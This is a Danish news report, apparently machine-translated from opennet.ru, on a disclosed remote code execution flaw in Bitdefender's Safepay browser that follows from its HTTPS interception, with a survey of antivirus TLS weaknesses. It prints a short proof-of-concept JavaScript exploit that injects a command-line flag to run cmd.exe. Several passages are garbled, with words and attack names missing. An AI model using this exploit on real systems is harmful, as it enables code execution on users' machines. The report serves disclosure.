Vladimir Palant, skaberen af Adblock Plus, () i den specialiserede Safepay-webbrowser baseret på Chromium-motoren, der tilbydes som en del af Bitdefender Total Security 2020-antiviruspakken og har til formål at øge sikkerheden for brugerens arbejde på det globale netværk (f.eks. ydes der yderligere isolation ved adgang til banker og betalingssystemer). Sårbarheden gør det muligt for websteder, der åbnes i browseren, at udføre vilkårlig kode på operativsystemniveau.
Årsagen til problemet er, at Bitdefender antivirus udfører lokal aflytning af HTTPS-trafik ved at erstatte webstedets originale TLS-certifikat. Et ekstra rodcertifikat er installeret på klientens system, som gør det muligt at skjule driften af det anvendte trafikinspektionssystem. Antivirusprogrammet kiler sig ind i beskyttet trafik og indsætter sin egen JavaScript-kode på nogle sider for at implementere Safe Search-funktionen, og i tilfælde af problemer med det sikre forbindelsescertifikat erstatter det den returnerede fejlside med sin egen. Da den nye fejlside serveres på vegne af serveren, der åbnes, har andre sider på den server fuld adgang til indholdet indsat af Bitdefender.
Når du åbner et websted, der kontrolleres af en angriber, kan det websted sende en XMLHttpRequest og foregive problemer med HTTPS-certifikatet, når det svarer, hvilket vil føre til returnering af en fejlside, der er forfalsket af Bitdefender. Da fejlsiden åbnes i sammenhæng med angriberens domæne, kan han læse indholdet af den forfalskede side med Bitdefender-parametre. Siden leveret af Bitdefender indeholder også en sessionsnøgle, der giver dig mulighed for at bruge den interne Bitdefender API til at starte en separat Safepay-browsersession, specificere vilkårlige kommandolinjeflag og til at starte systemkommandoer ved hjælp af "--utility-cmd-prefix" flag. Et eksempel på en udnyttelse (param1 og param2 er værdier hentet fra fejlsiden):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Indholdstype", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Lad os huske, at en undersøgelse udført i 2017 at 24 ud af 26 testede antivirusprodukter, der inspicerer HTTPS-trafik gennem certifikatspoofing, reducerede det overordnede sikkerhedsniveau for en HTTPS-forbindelse.
Kun 11 af de 26 produkter leverede aktuelle krypteringspakker. 5 systemer bekræftede ikke certifikater (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Kaspersky Internet Security- og Total Security-produkterne var udsat for angreb , og AVG-, Bitdefender- og Bullguard-produkter angribes и . Dr.Web Antivirus 11 giver dig mulighed for at rulle tilbage til upålidelige eksportkrypteringer (angreb ).
Kilde: opennet.ru